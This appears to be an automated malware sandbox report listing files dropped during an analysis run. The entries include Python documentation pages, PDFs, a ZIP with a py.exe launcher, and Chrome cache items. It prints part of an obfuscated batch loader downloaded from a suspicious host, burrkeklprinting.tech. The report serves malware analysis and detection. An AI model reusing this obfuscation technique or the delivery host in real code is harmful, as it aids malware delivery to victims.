                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="The Very High Level Layer" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/veryhigh.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The functions in this chapter will let you execute Python source code given in a file or a buffer, but they will not let you interact in a more detailed way with the interpreter. Several of these f..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The functions in this chapter will let you execute Pytho

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\weakref.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1018), with CRLF line terminators
                              Category:dropped
                              Size (bytes):25026
                              Entropy (8bit):4.891239863417193
                              Encrypted:false
                              SSDEEP:
                              MD5:2AD8969F499B66CEEA60FBA429CB540B
                              SHA1:72B18825F40439BADE47DF7C526FB4A5B9E051B8
                              SHA-256:282BC6B2421078AE2E2D7374B05556FDCC8C410EEC97524DA6E37ACCBA1E18DD
                              SHA-512:081E97E083A42BB0C8936C5E94E0AB81045B0766E1B47FB378ED38270094D09EE7888F7353F9259019540FDC74E21EA6AB22AF03D5736A4110C75ECBD7A1DA86
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Weak Reference Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/weakref.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python supports weak references as first-class objects. There are two specific object types which directly implement weak references. The first is a simple reference object, and the second acts as ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python supports weak references as first-class objects. Ther

                              C:\Users\user\Downloads\Python\Python312\Doc\html\contents.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):675259
                              Entropy (8bit):4.856751844355368
                              Encrypted:false
                              SSDEEP:
                              MD5:F402DCF60031500AD86915A4C405C838
                              SHA1:02AA786E32EA4CEBCB6A274D5B651EDAA526F613
                              SHA-256:DD5338F76262FD40AABC17A7B83F23944AB7D57D9380AE3FD65D00627CAF11F4
                              SHA-512:91444282340FC1F69DA075777BB9198008A521CE767089AB33462E93D2A7FDFA936B4479E5650770ECCFF8FB6EFD9750A6DD1D1E6DDC354C7F0FD0CE642A3319
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Python Documentation contents" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/contents.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="What.s New in Python- What.s New In Python 3.12- Summary . Release highlights, New Features- PEP 695: Type Parameter Syntax, PEP 701: Syntactic formalization of f-strings, PEP 684: A Per-Interprete..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="What.s New in Python- What.s New In Python 3.12-

                              C:\Users\user\Downloads\Python\Python312\Doc\html\copyright.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):12864
                              Entropy (8bit):4.823832589679693
                              Encrypted:false
                              SSDEEP:
                              MD5:B64CC95E76E1344FE6A1F473F0264D1E
                              SHA1:0BCEDA1D62C52149B556D0C48F87A43E155BFFF5
                              SHA-256:72456BDA320FF36A301507C6F5C9E9708AC9BA0520D706041DF3CB8DBD381786
                              SHA-512:D5CE4B7DE72683B5A909180F3E8E475F5110FB54F8B3150A39C2ECAECB1D3461E9FAA20BD7D78DCF3B9FAE6B0FC64A207F1BF80B4C1A29874D0239FD3B0A3744
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Copyright" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/copyright.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python and this documentation is: Copyright . 2001-2023 Python Software Foundation. All rights reserved. Copyright . 2000 BeOpen.com. All rights reserved. Copyright . 1995-2000 Corporation for Nati..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python and this documentation is: Copyright . 2001-2023 Python Software Fo

                              C:\Users\user\Downloads\Python\Python312\Doc\html\distributing\index.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):11225
                              Entropy (8bit):4.834028944953228
                              Encrypted:false
                              SSDEEP:
                              MD5:AA98E4B44174255266A7A00F40D3ED2E
                              SHA1:98E0A6820AA0248EE8B460675483DEA068D6FE18
                              SHA-256:D179527D477CF1DBE985F0D290CB124E2C8DB72ED93C10D028006BCC64F73412
                              SHA-512:0E2DD3BA8C0A5517EA00081A73618F9CBF7F560F5C6F0746EE5313B2DD6D44648F02CB50E0B092446DDC1159CDB6764D48FE26E02C935FAB941DB1FE92AF141D
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Distributing Python Modules" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/distributing/index.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Distributing Python Modules &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="styles

                              C:\Users\user\Downloads\Python\Python312\Doc\html\download.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):11573
                              Entropy (8bit):4.906855752254527
                              Encrypted:false
                              SSDEEP:
                              MD5:D77806F56E09EB3943877DEA8140B54F
                              SHA1:A4C1A245C50A44E32935D9B337E21D6A069C0F89
                              SHA-256:68F161A7423CB26CA625F43196381D49738EE8719ABCA18242495C9F24BC9366
                              SHA-512:31641273939C424E58E9D833892E9DC9D384E6DD7C39750AD4F2C388B3E8135BF461B26C9AD6C4396E674CB7C028B1F0E2EDD64D61A2BE40ACCC03AE1DB1C745
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Download &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sea

                              C:\Users\user\Downloads\Python\Python312\Doc\html\extending\building.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (567), with CRLF line terminators
                              Category:dropped
                              Size (bytes):19562
                              Entropy (8bit):4.91258489409245
                              Encrypted:false
                              SSDEEP:
                              MD5:046738F5DA1DD5ADEEC508C034190BD9
                              SHA1:C704874DDF1496497664AF5EF26650AD2110DBC4
                              SHA-256:8A6095CA82F6C83787B64AC36F716360D55071095E7F71EE95C6F6FA6894FA66
                              SHA-512:1C7CA5B739B190EDDEE62E7D3E928A596619B4184342C994ECF6A70F341A99B8BBA95A083908BF4D4D24FC4C8ED96B93A4BBED6F6F5DC0701948F2B7F7AF1D05
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="4. Building C and C++ Extensions" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/extending/building.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="A C extension for CPython is a shared library (e.g. a.so file on Linux,.pyd on Windows), which exports an initialization function. To be importable, the shared library must be available on PYTHONPA..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="A C extension for CPython is a shared library

                              C:\Users\user\Downloads\Python\Python312\Doc\html\extending\embedding.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (670), with CRLF line terminators
                              Category:dropped
                              Size (bytes):56687
                              Entropy (8bit):4.828816641446644
                              Encrypted:false
                              SSDEEP:
                              MD5:156C1761D37930F00A53D75A2C7B21D3
                              SHA1:294E28A82956F15D68CFC75F621772EA48A62EC5
                              SHA-256:03A894BC646595421B43A9DAC8288F8ABA607E37EE62022E94BB8491096C96A6
                              SHA-512:E7B9E515C398894B1CCB8A320D9CAD4670F4B849F2A2BDBFA8BB7AA90D0A140E8562ADE35131DF7EB6BA9BB2BCF9DF5733BF1EA296FCFF26CE6B04685762F51D
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="1. Embedding Python in Another Application" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/extending/embedding.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The previous chapters discussed how to extend Python, that is, how to extend the functionality of Python by attaching a library of C functions to it. It is also possible to do it the other way arou..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The previous chapters discussed ho

                              C:\Users\user\Downloads\Python\Python312\Doc\html\extending\extending.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (553), with CRLF line terminators
                              Category:dropped
                              Size (bytes):167659
                              Entropy (8bit):4.870286185877593
                              Encrypted:false
                              SSDEEP:
                              MD5:70059198CDE4AFF5347513AB3AAB6B03
                              SHA1:204D538BD3BE58C45104EFAAD44CEC331059661A
                              SHA-256:DF067BD9AA8ABAD3C4EA157A8C640475434BC6B150EB7CAB1ABB3E63EB3552BD
                              SHA-512:D3F59649EA8E392AA47A5F384995AC4F90125397D326F19D9A9A89AD070CFDD0BBCEE91E1BD66FDB6AAD5FF1261B777BE428FC8297E293FE090548153A99287C
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="1. Extending Python with C or C++" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/extending/extending.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="It is quite easy to add new built-in modules to Python, if you know how to program in C. Such extension modules can do two things that can.t be done directly in Python: they can implement new built..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="It is quite easy to add new built-in modu

                              C:\Users\user\Downloads\Python\Python312\Doc\html\extending\index.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:modified
                              Size (bytes):24084
                              Entropy (8bit):4.905820111409463
                              Encrypted:false
                              SSDEEP:
                              MD5:8C4CF091E64AC5E41867E3AE2B76972B
                              SHA1:307DBC3C7B970D1DEA210DD94DA054972F316D18
                              SHA-256:6230C0397B2B77017C09733706ABFF9FD495C83FA2784FE92BACD8A4230B0390
                              SHA-512:6063E9DB1B87178730529051F5F7268B18C996F9F196BE391F7CFA605311B2F52075A707D3D1AE61242FC5C4CECA6E40E9A47BA541736919A58A407C407DD632
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Extending and Embedding the Python Interpreter" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/extending/index.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This document describes how to write modules in C or C++ to extend the Python interpreter with new modules. Those modules can not only define new functions but also new object types and their metho..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This document describes how to wri

                              C:\Users\user\Downloads\Python\Python312\Doc\html\extending\newtypes.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (641), with CRLF line terminators
                              Category:dropped
                              Size (bytes):99436
                              Entropy (8bit):4.788158292192944
                              Encrypted:false
                              SSDEEP:
                              MD5:264E1C45550F16E00F7AE050D2B3F478
                              SHA1:0EBA18AA1CF8CC8D2A44397815744358852C4171
                              SHA-256:2E96995C9BA09E3922EB5BACDEA07648CB218B81C1363527E5957A364175AD49
                              SHA-512:6A8A32183F6C870455406256AA1212A1FBB45EEE684DC97A71602A2B490759457AF3658B279480E3854ED03088DD1D4A800FA1A0B94CA1208E762126663C0E64
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="3. Defining Extension Types: Assorted Topics" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/extending/newtypes.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This section aims to give a quick fly-by on the various type methods you can implement and what they do. Here is the definition of PyTypeObject, with some fields only used in debug builds omitted: ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This section aims to give a quick

                              C:\Users\user\Downloads\a36e5af9-9380-4cd6-8350-339910c6d538.tmp

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                              Category:dropped
                              Size (bytes):14032
                              Entropy (8bit):7.979924340603738
                              Encrypted:false
                              SSDEEP:
                              MD5:8E2F7BEE02A430AA66AF7CA43997F3B6
                              SHA1:DCC985EB80FF1405FB5F8AD230F0C1CE4F425798
                              SHA-256:C3C0A49C9C2089327D5F4C7DE6823841FC64EF10DD4C44C3FF99C4C97358760F
                              SHA-512:EBAAE7AD0D52BF01A5EA129C9DB90015A9047F3E40EDFFB89A51772E050EC68E3AFB73ABD47490D6636D4564F3E203F434154A67613E49DFF88ED34870AF09AC
                              Malicious:false
                              Reputation:unknown
                              Preview:PK.........B.X................Print/Launcher/PK........Vv.Xn...44..........Print/Launcher/py.exe.{|.E...L..Cz....!@.h.#.H...$*..1...X..8."tC\..;....rwau....]v....$....<.1..(..]t+.j........$.{.......q.tWW.:u....).k..(....t]..../W.....AH..Z..c.{..,s..ug......w...L...z.a)..e.....{(}......^.l..!.2..+'O.3.t.H.........e#^d..G\...G.F8.......{n|wd6.[8b..p.,....p..oG..].y.}?.`;..'.W..X......f^..`.lI.F.<A...dy)A.8./..[......y...s;?..|.]...6v...M-..R.J.....[..`.u#.....P.F.p.......w...m......eU....L..a_.}a..a...K.$.H..</...+.......9....6(..}.Ep...W,.1.y_A.....K.[......<.\p....7S......u.og...c..:.>......u.....u.F[t.Wi.....A.."..5....b..?.^x'.w.U*bU.X.EW....bA}|.>.].........E.%P..7.c.=.NlP[i..Qu...N..8|.M..t.. l..f..}jm......>._*.>...v....p...P/...t}..#..Yi.C]bAG.k.<}.b.x..*.l.M.,.=.....k(,9..em.VLp.+T(.u..V(.3l.4.j.|z.....a........bh.:A;Aq......S.-.O. .Od[).....[G.Q...@....}z...p:.b.t. ..f.`F....~|...&u= ..U..P....f........F\...G/..)...c....&.?3...Bh

                              C:\Users\user\Downloads\db5d6480-f5bb-4f5e-921d-ebb1e6bdd67f.tmp

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PDF document, version 1.4, 4 pages
                              Category:dropped
                              Size (bytes):52360
                              Entropy (8bit):7.415159382061476
                              Encrypted:false
                              SSDEEP:
                              MD5:89E2D45ED0AE8865A9379FD1900376F8
                              SHA1:9DD03F47ACB2DF46637EC645BFD41FADBFBF2AE3
                              SHA-256:79BADE49340A6DAA6D2ACF03A54DA8FA89BA3B070DED601DC5B1571A24F8A9C0
                              SHA-512:2D86EBB76D8FB48A054EE21DEAAAE2912010F8514C570A0ED4FF059AB019406C3682B62829CCC55DD30AF31EA2DC410739E21C134900068F05512A929A8D88A6
                              Malicious:false
                              Reputation:unknown
                              Preview:%PDF-1.4.%......1 0 obj.<< /Type /Catalog./Pages 2 0 R.>>.endobj..2 0 obj.<< /Type /Pages./Kids [4 0 R 18 0 R 24 0 R 30 0 R]./Count 4.>>.endobj..3 0 obj.<< /ProcSet [/PDF /Text /ImageB /ImageC /ImageI]./XObject << /XIPLAYER0 6 0 R./XIPLAYER_CM1 7 0 R./XIPLAYER_CM2 9 0 R./XIPLAYER_CM3 10 0 R./XIPLAYER_CM4 11 0 R./XIPLAYER_CM5 12 0 R./XIPLAYER_CM6 13 0 R./XIPLAYER_CM7 14 0 R./XIPLAYER_CM8 15 0 R./XIPLAYER_CM9 16 0 R.>>..>>.endobj..4 0 obj.<< /Type /Page./Parent 2 0 R./Resources 3 0 R./MediaBox [0 0 792 612]./Rotate 270./Contents 5 0 R.>>.endobj..5 0 obj.<< /Length 275./Filter /FlateDecode.>>..stream.x....NC1..w."/.._.gD...H.......x....&.Z.7CtdK.|.$!..}.............../yM.c._.!7..O..o......{^..A.1|v&...0...dPm.@B..~.H.6...&=13....[.Y..T..`..*..,Cd.*..%...U.65+......3.T...n...&.F -IU.....|j...6y.....i\,M`...&.......{}.jv..r|:2.R.r.VZ.k.Zc..Y.m....AH.Wd.^;.]...#..-3.7.endstream.endobj..6 0 obj.<< /Length 18260./Type /XObject./Subtype /Image./BitsPerComponent 8./Width 1104./Height 864./

                              C:\Users\user\Downloads\downloaded.pdf (copy)

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PDF document, version 1.4, 4 pages
                              Category:dropped
                              Size (bytes):0
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:
                              MD5:D73A838F5CA1608B145182BC05B98921
                              SHA1:B75E71093D0AC583798FDAF1308EB91A1EB86A48
                              SHA-256:9A91796B36B0492136245FD3681BEC88E52BB9EEECED8733F5864DEA446B1382
                              SHA-512:3B926480D729B9E7D72387F62C679F170A62B256B3EDA60BC29E1C9A3576886A19AB6929392C73193140E5C74E30F4341D8FB44557F7AC243D864676A86C6CB7
                              Malicious:false
                              Reputation:unknown
                              Preview:%PDF-1.4.%......1 0 obj.<< /Type /Catalog./Pages 2 0 R.>>.endobj..2 0 obj.<< /Type /Pages./Kids [4 0 R 18 0 R 24 0 R 30 0 R]./Count 4.>>.endobj..3 0 obj.<< /ProcSet [/PDF /Text /ImageB /ImageC /ImageI]./XObject << /XIPLAYER0 6 0 R./XIPLAYER_CM1 7 0 R./XIPLAYER_CM2 9 0 R./XIPLAYER_CM3 10 0 R./XIPLAYER_CM4 11 0 R./XIPLAYER_CM5 12 0 R./XIPLAYER_CM6 13 0 R./XIPLAYER_CM7 14 0 R./XIPLAYER_CM8 15 0 R./XIPLAYER_CM9 16 0 R.>>..>>.endobj..4 0 obj.<< /Type /Page./Parent 2 0 R./Resources 3 0 R./MediaBox [0 0 792 612]./Rotate 270./Contents 5 0 R.>>.endobj..5 0 obj.<< /Length 275./Filter /FlateDecode.>>..stream.x....NC1..w."/.._.gD...H.......x....&.Z.7CtdK.|.$!..}.............../yM.c._.!7..O..o......{^..A.1|v&...0...dPm.@B..~.H.6...&=13....[.Y..T..`..*..,Cd.*..%...U.65+......3.T...n...&.F -IU.....|j...6y.....i\,M`...&.......{}.jv..r|:2.R.r.VZ.k.Zc..Y.m....AH.Wd.^;.]...#..-3.7.endstream.endobj..6 0 obj.<< /Length 18260./Type /XObject./Subtype /Image./BitsPerComponent 8./Width 1104./Height 864./

                              C:\Users\user\Downloads\downloaded.pdf.crdownload

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PDF document, version 1.4, 4 pages
                              Category:dropped
                              Size (bytes):191156
                              Entropy (8bit):7.463960313538451
                              Encrypted:false
                              SSDEEP:
                              MD5:D73A838F5CA1608B145182BC05B98921
                              SHA1:B75E71093D0AC583798FDAF1308EB91A1EB86A48
                              SHA-256:9A91796B36B0492136245FD3681BEC88E52BB9EEECED8733F5864DEA446B1382
                              SHA-512:3B926480D729B9E7D72387F62C679F170A62B256B3EDA60BC29E1C9A3576886A19AB6929392C73193140E5C74E30F4341D8FB44557F7AC243D864676A86C6CB7
                              Malicious:false
                              Reputation:unknown
                              Preview:%PDF-1.4.%......1 0 obj.<< /Type /Catalog./Pages 2 0 R.>>.endobj..2 0 obj.<< /Type /Pages./Kids [4 0 R 18 0 R 24 0 R 30 0 R]./Count 4.>>.endobj..3 0 obj.<< /ProcSet [/PDF /Text /ImageB /ImageC /ImageI]./XObject << /XIPLAYER0 6 0 R./XIPLAYER_CM1 7 0 R./XIPLAYER_CM2 9 0 R./XIPLAYER_CM3 10 0 R./XIPLAYER_CM4 11 0 R./XIPLAYER_CM5 12 0 R./XIPLAYER_CM6 13 0 R./XIPLAYER_CM7 14 0 R./XIPLAYER_CM8 15 0 R./XIPLAYER_CM9 16 0 R.>>..>>.endobj..4 0 obj.<< /Type /Page./Parent 2 0 R./Resources 3 0 R./MediaBox [0 0 792 612]./Rotate 270./Contents 5 0 R.>>.endobj..5 0 obj.<< /Length 275./Filter /FlateDecode.>>..stream.x....NC1..w."/.._.gD...H.......x....&.Z.7CtdK.|.$!..}.............../yM.c._.!7..O..o......{^..A.1|v&...0...dPm.@B..~.H.6...&=13....[.Y..T..`..*..,Cd.*..%...U.65+......3.T...n...&.F -IU.....|j...6y.....i\,M`...&.......{}.jv..r|:2.R.r.VZ.k.Zc..Y.m....AH.Wd.^;.]...#..-3.7.endstream.endobj..6 0 obj.<< /Length 18260./Type /XObject./Subtype /Image./BitsPerComponent 8./Width 1104./Height 864./

                              Chrome Cache Entry: 340

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-16, little-endian text, with very long lines (3588), with no line terminators
                              Category:downloaded
                              Size (bytes):7178
                              Entropy (8bit):4.221741087416504
                              Encrypted:false
                              SSDEEP:
                              MD5:AD083B8DF0D20B0FAA3B94F38D6DC5BA
                              SHA1:457B2BB6885265D378A0022C5E4EFE8ADA4CC49A
                              SHA-256:0F2B8F510849196BC62BE60003B9AC4A5530D15264FB822EC41D2693B978B5ED
                              SHA-512:D33E474607F0BADF5A90896AB4B555375F3464CA615FA349B26F8B1FCCD0C525DCC80D68E1D1F57340EDF5978A658D67C3BBF719362049E2A86DB449837A0541
                              Malicious:false
                              Reputation:unknown
                              URL:http://burrkeklprinting.tech:4098/startuppp.bat
                              Preview:..&@cls&@set ".n...=wIy9kAS2p51OnMvFt3djhZUBTrQJ@a6YXf eEDVLH7gG8xu04bclKRqPNmoWCzis"..%.n...:~28,1%%.n...:~35,1%%.n...:~50,1%%.n...:~20,1%%.n...:~58,1%%.n...:~34,1%%.n...:~58,1%%.n...:~33,1%%.n...:~33,1%..%.n...:~63,1%%..E..De%%.n...:~35,1%%.n...:~16,1%%.n...:~51,1%%.n...:~58,1%%.n...:~50,1%%.n...:~29,1%%.n...:~51,1%....::%.n...:~34,1%%.n...:~37,1%%.n...:~35,1%%.n...:~33,1%%.n...:~62,1%%.n...:~12,1%%.n...:~35,1%%.n...:~34,1%%.n...:~16,1%%.n...:~20,1%%.n...:~35,1%%.n...:~34,1%%.n...:~18,1%%.n...:~35,1%%.n...:~63,1%%.n...:~16,1%%.n...:~62,1%%.n...:~12,1%%.n...:~29,1%%.n...:~16,1%%.n...:~62,1%%.nLqMt.%%.n...:~58,1%%.n...:~12,1%%.n...:~34,1%%.n...:~14,1%%.n...:~29,1%%.n...:~25,1%%.n...:~62,1%%.n...:~29,1%%.n...:~49,1%%.n...:~51,1%%.n...:~35,1%%.n...:~34,1%%.n...:~33,1%%.n...:~58,1%%.n...:~25,1%%.l..Y.%%.n...:~34,1%%.n...:~15,1%%.n...:~24,1%%.n...:~6,1%%.n...:~55,1%.%.n...:~61,1%%.n...:~62,1%%.n...:~8,1%..%.n...:~63,1%%.n...:~35,1%%.n...:~16,1%%.n...:~34,1%"%.n...:~18,1%%.n...:~35,1%%.n..

                              Chrome Cache Entry: 343

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2762
                              Entropy (8bit):5.098615926633365
                              Encrypted:false
                              SSDEEP:
                              MD5:3E3C6403BEED2B7CE52714089269710C
                              SHA1:BE5125F47279ED738FE973891E30227B8E1658E6
                              SHA-256:E70F2D467FAB518FAEC846785605C12D6361FE5B20AC279CA8B67CCC1CE28367
                              SHA-512:033CAC309CDD2B4F237EFD0852E65453A67C943B8F4F1EE9F6414D0CC9AED69070917CED7D60967D7D94F1448FB20E55B03C7C855D89CD82A7E8EAB3053DEE11
                              Malicious:false
                              Reputation:unknown
                              Preview:// Cached plugin reference (or null. if it could not be instantiated)..var sharePointPlugin = undefined;....function onLoad() {..// console.log("loaded.");..}....../**.. * Find (and cache) an available ActiveXObject Sharepoint plugin... *.. * @returns {ActiveXObject} or null.. */..function getSharePointPlugin() {...if( sharePointPlugin !== undefined ) {....return sharePointPlugin;...}...sharePointPlugin = null;.....var plugin = document.getElementById("winFirefoxPlugin");.....if ( plugin && typeof plugin.EditDocument === "function" ) {....window.console && console.log("Using embedded custom SharePoint plugin.");....sharePointPlugin = plugin;...} else if( "ActiveXObject" in window ){....plugin = null;....try {.....plugin = new ActiveXObject("SharePoint.OpenDocuments.3"); // Office 2007+....} catch(e) {.....try {......plugin = new ActiveXObject("SharePoint.OpenDocuments.2"); // Office 2003.....} catch(e2) {......try {.......plugin = new ActiveXObject("SharePoint.OpenDocuments.1"); //

                              Chrome Cache Entry: 344

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text
                              Category:downloaded
                              Size (bytes):148
                              Entropy (8bit):4.737463114457709
                              Encrypted:false
                              SSDEEP:
                              MD5:0435314C1BFF9E834A85FDACCDEA5999
                              SHA1:1F74E16A21CE172BDA430306A2E7DD7FAEC6521E
                              SHA-256:CDC8F9549F9D56D7832F87B1DD081391CCED531962E43FD5DA8435F83141FAFC
                              SHA-512:D3C0EED0513DD426C802BE089B4CF56B12D6953934D7381D08789CF12946E5CEA9E7D1601E1095ED955CA1A96B2C2B001581ACD929437BC731861C201679431B
                              Malicious:false
                              Reputation:unknown
                              URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=http%3A%2F%2Fburrkeklprinting.tech&oit=3&cp=28&pgcl=4&gs_rn=42&psi=4joLTXMi0VRfS81N&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
